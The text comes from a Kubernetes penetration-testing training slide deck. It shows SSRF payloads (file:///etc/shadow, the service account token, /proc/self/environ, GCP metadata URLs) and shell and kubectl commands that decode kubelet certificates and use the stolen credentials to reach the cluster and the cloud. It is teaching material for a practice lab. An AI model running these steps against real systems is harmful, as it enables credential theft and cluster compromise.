  • 17. • The application takes a URL from the user and makes a server side request on the user's behalf o Such a feature, if not protected properly is often vulnerable to Server Side Request Forgeries (SSRF/XSPA) • Depending on the request library used in the server side code, file:// is also a valid request protocol and can be used to read local files! • Try these as input o file:///etc/passwd o file:///etc/shadow
  • 18. • Let's read the token and ca.crt so that we can interact with the cluster using stolen credentials! Save these inside your Google CloudShell. file:///var/run/secrets/kubernetes.io/serviceaccount/token file:///var/run/secrets/kubernetes.io/serviceaccount/ca.crt • Run kubectl with the token and ca.crt to gain access to the cluster using the stolen secret of the service account o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes • Use auth plugin to view your current access with the stolen credentials kubectl auth can-i --token=`cat token` --certificate-authority=ca.crt - -list
  • 19.
  • 21. We can go a little further with our setup in this class. We have an app with SSRF running inside a GKE cluster. You can perform the following additional actions 1. Dump env data. This will reveal env variables that can have secrets,Kubernetes/GKE information etc. • file:///proc/self/environ 2. Read the node Instance Metadata using the SSRF to fetchthe kubelet credentials • http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env 3. Fetch the Google VM instance's compute service account's token and scope to query the underlying cloud platform itself! This is escaping from the cluster to the cloud environment. • http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token • http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scopes • http://169.254.169.254/computeMetadata/v1/project/project-id
  • 23. kube-env from Instance Metadata cat kube-env | grep ^TPM_BOOTSTRAP_CERT | awk '{print $2}' | base64 -d > kubelet.crt cat kube-env | grep ^TPM_BOOTSTRAP_KEY | awk '{print $2}' | base64 -d > kubelet.key cat kube-env | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt kubectl auth --client-certificate=kubelet.crt - -client-key=kubelet.key --certificate- authority=apiserver.crt --server=$KUBERNE TES_API_SERVER can-i --list https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-2-8efac412fbc5
  • 24. Google Cloud Compute SA Token Stealing
  • 25. Tear Down the Cluster (to avoid credit wastage) (optional, don't if you want to practice)
  • 26. 1. https://kubernetes.io/docs/concepts/security/pod-security-admission/ 2. https://kubernetes.io/docs/concepts/security/pod-security-standards/ 3. https://kubernetes.io/docs/reference/access-authn-authz/rbac/ 4. https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-1-2b328252954a 5. https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-2-8efac412fbc5 6. https://blog.appsecco.com/hacking-an-aws-hosted-kubernetes-backed-product-and-failing-904cbe0b7c0d 7. https://kloudle.com/blog/part-1-mapping-the-mitre-att-ck-framework-to-your-kubernetes-cluster-initial-access/ 8. https://kloudle.com/academy/simple-steps-to-set-up-a-2-node-kubernetes-cluster-using-kubeadm/ 9. https://kloudle.com/academy/auditing-kubernetes-with-kubeaudit-conducting-an-assessment/ 10. https://kloudle.com/blog/rogue-one-a-certified-kubernetes-administrator-cka-exam-story/ 11. https://kloudle.com/blog/refuting-aws-chain-attack-digging-deeper-into-eks-zero-days-claim/ 12. https://kloudle.com/academy/5-important-security-settings-you-need-to-review-for-your-gke-clusters/ 13. https://kloudle.com/blog/developerweek-europe-2021-walkthrough-of-the-talk-slides-and-audience-questions/ 14. https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata 15. Hacking Kubernetes Clusters - https://www.youtube.com/watch?v=xDj4_ZI1Y9A 16. Kubernetes 101 - https://www.youtube.com/watch?v=Z5nj6IpNJIM 17. Kubernetes Crash Course for Absolute Beginners - https://youtu.be/s_o8dwzRlu4?t=104
  • 27. Q&A
  • 28. • Riyaz Walikar, Chief Hacker, run the Kubernetes Penetration Testing as a Service at Appsecco • Appsecco is a boutique security consulting company with customers across the world. • Over a decade and half experience with hacking web apps, APIs, mobile, wireless, networks and more lately cloud and containers • Love to teach! Speak and train at a bunch of conferences! https://www.linkedin.com/in/riyazw/ riyaz@appsecco.com | +91 9886042242 https://appsecco.com | https://blog.appsecco.com
  • 29. About Appsecco Pragmatic, holistic, business-focused approach Specialist Cloud and Application Security company Highly experienced and diverse team Assigned multiple CVEs Certified hackers OWASP chapter leads Cloud and Kubernetes security experts Black Hat & Def Con speakers